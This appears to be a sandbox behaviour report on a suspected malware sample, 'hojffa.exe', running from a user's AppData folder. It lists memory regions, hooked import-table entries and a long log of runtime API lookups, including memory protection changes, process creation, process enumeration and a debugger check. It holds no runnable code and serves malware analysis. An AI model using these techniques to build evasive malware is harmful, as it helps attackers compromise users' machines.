private_0x00000000772b0000 0x772b0000 0x773cefff Private Memory Readable, Writable, Executable True False False -
private_0x00000000773d0000 0x773d0000 0x774c9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x774d0000 0x77678fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x77680000 0x77684fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x776b0000 0x7782ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 84 entries are omitted.
The remaining entries can be found in flog.txt.
Hook Information
Type Installer Target Size Information Actions
IAT private_0x0000000000210000:+0xbec 1. entry of hojffa.exe 4 bytes kernel32.dll:SetFileShortNameW+0x0 now points to pagefile_0x0000000000650000:+0xe0065
IAT private_0x0000000000210000:+0xbec 4. entry of hojffa.exe 4 bytes kernel32.dll:FileTimeToSystemTime+0x0 now points to pagefile_0x0000000000650000:+0xd0066
IAT private_0x0000000000210000:+0xbec 5. entry of hojffa.exe 4 bytes kernel32.dll:LoadLibraryW+0x0 now points to hojffa.exe:+0x2002d
IAT private_0x0000000000210000:+0xbec 7. entry of hojffa.exe 4 bytes kernel32.dll:GetProcAddress+0x0 now points to pagefile_0x0000000000650000:+0xf0069
IAT private_0x0000000000210000:+0xbec 8. entry of hojffa.exe 4 bytes kernel32.dll:CreateMailslotW+0x0 now points to hojffa.exe:+0x3002d
IAT private_0x0000000000210000:+0xbec 10. entry of hojffa.exe 4 bytes kernel32.dll:FlushFileBuffers+0x0 now points to pagefile_0x0000000000650000:+0x7006e
IAT private_0x0000000000210000:+0xbec 11. entry of hojffa.exe 4 bytes ntdll.dll:RtlDecodePointer+0x0 now points to hojffa.exe:+0x2002d
IAT private_0x0000000000210000:+0xbec 13. entry of hojffa.exe 4 bytes kernel32.dll:SetLastError+0x0 now points to pagefile_0x0000000000650000:+0x9006e
IAT private_0x0000000000210000:+0xbec 16. entry of hojffa.exe 4 bytes kernel32.dll:SetUnhandledExceptionFilter+0x0 now points to pagefile_0x0000000000650000:+0xf0070
IAT private_0x0000000000210000:+0xbec 19. entry of hojffa.exe 4 bytes kernel32.dll:IsProcessorFeaturePresent+0x0 now points to pagefile_0x0000000000650000:+0xd0073
IAT private_0x0000000000210000:+0xbec 21. entry of hojffa.exe 4 bytes kernel32.dll:GetCurrentProcessId+0x0 now points to private_0x00000000002a0000:+0x30050
IAT private_0x0000000000210000:+0xbec 22. entry of hojffa.exe 4 bytes kernel32.dll:GetCurrentThreadId+0x0 now points to private_0x0000000000550000:+0xc004c
IAT private_0x0000000000210000:+0xbec 23. entry of hojffa.exe 4 bytes kernel32.dll:GetSystemTimeAsFileTime+0x0 now points to pagefile_0x0000000000650000:+0x90074
IAT private_0x0000000000210000:+0xbec 25. entry of hojffa.exe 4 bytes kernel32.dll:IsDebuggerPresent+0x0 now points to pagefile_0x0000000000650000:+0x110073
IAT private_0x0000000000210000:+0xbec 28. entry of hojffa.exe 4 bytes kernel32.dll:RtlUnwind+0x0 now points to pagefile_0x0000000000650000:+0x150061
IAT private_0x0000000000210000:+0xbec 29. entry of hojffa.exe 4 bytes ntdll.dll:RtlEnterCriticalSection+0x0 now points to hojffa.exe:+0x1002d
IAT private_0x0000000000210000:+0xbec 30. entry of hojffa.exe 4 bytes ntdll.dll:RtlLeaveCriticalSection+0x0 now points to private_0x00000000002a0000:+0x3005a
IAT private_0x0000000000210000:+0xbec 31. entry of hojffa.exe 4 bytes ntdll.dll:RtlDeleteCriticalSection+0x0 now points to pagefile_0x0000000000650000:+0x140043
IAT private_0x0000000000210000:+0xbec 32. entry of hojffa.exe 4 bytes kernel32.dll:InitializeCriticalSectionAndSpinCount+0x0 now points to pagefile_0x0000000000650000:+0x70072
IAT private_0x0000000000210000:+0xbec 34. entry of hojffa.exe 4 bytes kernel32.dll:TlsGetValue+0x0 now points to pagefile_0x0000000000650000:+0x73
IAT private_0x0000000000210000:+0xbec 37. entry of hojffa.exe 4 bytes kernel32.dll:FreeLibrary+0x0 now points to pagefile_0x0000000000650000:+0xe006d
IAT private_0x0000000000210000:+0xbec 38. entry of hojffa.exe 4 bytes kernel32.dll:LoadLibraryExW+0x0 now points to hojffa.exe:+0x2002d
IAT private_0x0000000000210000:+0xbec 40. entry of hojffa.exe 4 bytes kernel32.dll:GetModuleHandleExW+0x0 now points to pagefile_0x0000000000650000:+0x150075
IAT private_0x0000000000210000:+0xbec 41. entry of hojffa.exe 4 bytes kernel32.dll:GetStdHandle+0x0 now points to private_0x0000000000550000:+0x2d
IAT private_0x0000000000210000:+0xbec 42. entry of hojffa.exe 4 bytes kernel32.dll:WriteFile+0x0 now points to private_0x00000000002a0000:+0x3005a
IAT private_0x0000000000210000:+0xbec 43. entry of hojffa.exe 4 bytes kernel32.dll:GetModuleFileNameA+0x0 now points to pagefile_0x0000000000650000:+0x140043
IAT private_0x0000000000210000:+0xbec 44. entry of hojffa.exe 4 bytes kernel32.dll:MultiByteToWideChar+0x0 now points to pagefile_0x0000000000650000:+0x70072
IAT private_0x0000000000210000:+0xbec 46. entry of hojffa.exe 4 bytes kernel32.dll:GetACP+0x0 now points to pagefile_0x0000000000650000:+0x100071
IAT private_0x0000000000210000:+0xbec 47. entry of hojffa.exe 4 bytes kernel32.dll:HeapFree+0x0 now points to private_0x00000000002a0000:+0x3007a
IAT private_0x0000000000210000:+0xbec 48. entry of hojffa.exe 4 bytes ntdll.dll:RtlAllocateHeap+0x0 now points to hojffa.exe:+0x30045
IAT private_0x0000000000210000:+0xbec 50. entry of hojffa.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x0000000000650000:+0xd0061
IAT private_0x0000000000210000:+0xbec 53. entry of hojffa.exe 4 bytes kernel32.dll:GetFileType+0x0 now points to pagefile_0x0000000000650000:+0x3007a
IAT private_0x0000000000210000:+0xbec 56. entry of hojffa.exe 4 bytes kernel32.dll:FindFirstFileExA+0x0 now points to pagefile_0x0000000000650000:+0x64
IAT private_0x0000000000210000:+0xbec 57. entry of hojffa.exe 4 bytes kernel32.dll:FindNextFileA+0x0 now points to hojffa.exe:+0x1002d
IAT private_0x0000000000210000:+0xbec 59. entry of hojffa.exe 4 bytes kernel32.dll:GetOEMCP+0x0 now points to pagefile_0x0000000000650000:+0x90065
IAT private_0x0000000000210000:+0xbec 60. entry of hojffa.exe 4 bytes kernel32.dll:GetCPInfo+0x0 now points to hojffa.exe:+0x1002d
IAT private_0x0000000000210000:+0xbec 62. entry of hojffa.exe 4 bytes kernel32.dll:GetCommandLineW+0x0 now points to pagefile_0x0000000000650000:+0xe0065
IAT private_0x0000000000210000:+0xbec 65. entry of hojffa.exe 4 bytes kernel32.dll:SetStdHandle+0x0 now points to pagefile_0x0000000000650000:+0xd0066
IAT private_0x0000000000210000:+0xbec 66. entry of hojffa.exe 4 bytes kernel32.dll:GetProcessHeap+0x0 now points to hojffa.exe:+0x3002d
IAT private_0x0000000000210000:+0xbec 68. entry of hojffa.exe 4 bytes kernel32.dll:WriteConsoleW+0x0 now points to pagefile_0x0000000000650000:+0xd0073
IAT private_0x0000000000210000:+0xbec 70. entry of hojffa.exe 4 bytes ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x00000000002a0000:+0x30050
IAT private_0x0000000000210000:+0xbec 71. entry of hojffa.exe 4 bytes kernel32.dll:RaiseException+0x0 now points to pagefile_0x0000000000650000:+0x140043
Threads
Thread 0x7d0
365 0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-04 08:54:13 (UTC) True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x739d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76e80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76e94f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76e94208 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x739d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76e80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76e94f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76e91252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76e94208 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 2
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x76f147f1 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, size = 260 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Load module_name = kernel32.dll, base_address = 0x76e80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x76e9168c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76e9435f True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76e80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76e91856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76e9435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76e9186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76e93519 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76ead802 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x76e80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76e91809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x76e91136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x76e91986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76e910ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76e94950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x76e93f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x7770d598 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76e911c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76e91222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76e97a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76e91245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76e91410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76e911f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x76e91ae5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76e949d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x76e91700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x76e97a2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x76e934d5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76eb7aca True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x76eac807 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76e9435f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x76e9195e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76f1454f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76e91328 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76f37bff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76e9469b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x76e951a1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76e911a9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76e91450 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x776f0fcb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x776e9d35 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x76e94a6f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76e9192e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76e9170d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76e914e9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76e951b3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76e93531 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x776e45f5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76e94d40 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76e914b1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76e91282 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76e91725 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76e93509 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76e951e3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76e951cb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76e94a5d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76e95235 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76eb772f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76e987c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76e91916 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76ead802 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76e949ad True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76e911e0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76e914fb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76e93587 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76e934b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x776d22b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x776d2270 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76e914c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76e94493 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76e9179c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76ebd1a1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76e95189 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x76e9495d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x76ebd1d4 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x776de026 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x776f1f6e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76e91946 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x776e3002 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76e917b9 True 1
Module Load module_name = USER32.dll, base_address = 0x759f0000 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetFocus, address_out = 0x75a12175 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x75a09679 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperBuffW, address_out = 0x75a0fc5d True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x75a12320 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x75a07d2f True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x75a078e2 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x75a07809 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x75a0787b True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetForegroundWindow, address_out = 0x75a2f170 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x776e25dd True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x75a0b17d True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x75a08a29 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x75a09a55 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x75a10dfb True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = keybd_event, address_out = 0x75a602bf True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x75a13559 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowTextW, address_out = 0x75a120ec True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongW, address_out = 0x75a06ffe True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x75a08332 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SystemParametersInfoW, address_out = 0x75a090d3 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetAncestor, address_out = 0x75a09785 True 1
Module Load module_name = ntdll.dll, base_address = 0x776b0000 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlUnwind, address_out = 0x776f6d39 True 1
Module Load module_name = msvcr100.dll, base_address = 0x73910000 True 1
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x7392c544 True 1
System Get Time type = System Time, time = 2018-06-04 08:54:14 (UTC) True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76e80000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76e94f2b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76e9359f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76e91252 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76e94208 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76e94d28 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x76f1410b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76f14195 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x76e9d31f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x76eaee7e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x776f441c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7771c50e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7771c381 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x76eaf088 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x777005d7 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7771ca24 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x776d0b8c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x7778fde8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77721e1d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x76f14761 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x76f0cd11 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x76f1424f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x76f146b1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x76f26676 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x76f14751 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x76f265f1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x76f147c1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x76f147e1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x76f147f1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x76eaeee0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
File Open filename = STD_INPUT_HANDLE True 1
File Open filename = STD_OUTPUT_HANDLE True 1
File Open filename = STD_ERROR_HANDLE True 1
Environment Get Environment String - True 1
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, size = 260 True 1
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, size = 256 True 2
Module Load module_name = KERNEL32.dll, base_address = 0x76e80000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76e910ff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76ead802 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerifyVersionInfoW, address_out = 0x76ead423 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x76e94220 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x776e45f5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x76e92d3c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x76e94173 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x76e9103d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleInformation, address_out = 0x76ea195c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x76eb2b7a True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76e9192e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreatePipe, address_out = 0x76f1415b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x76eb8baf True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x76eb896c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76eb735f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x776d2270 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76e91410 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x76e94435 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x76e91b18 True 1
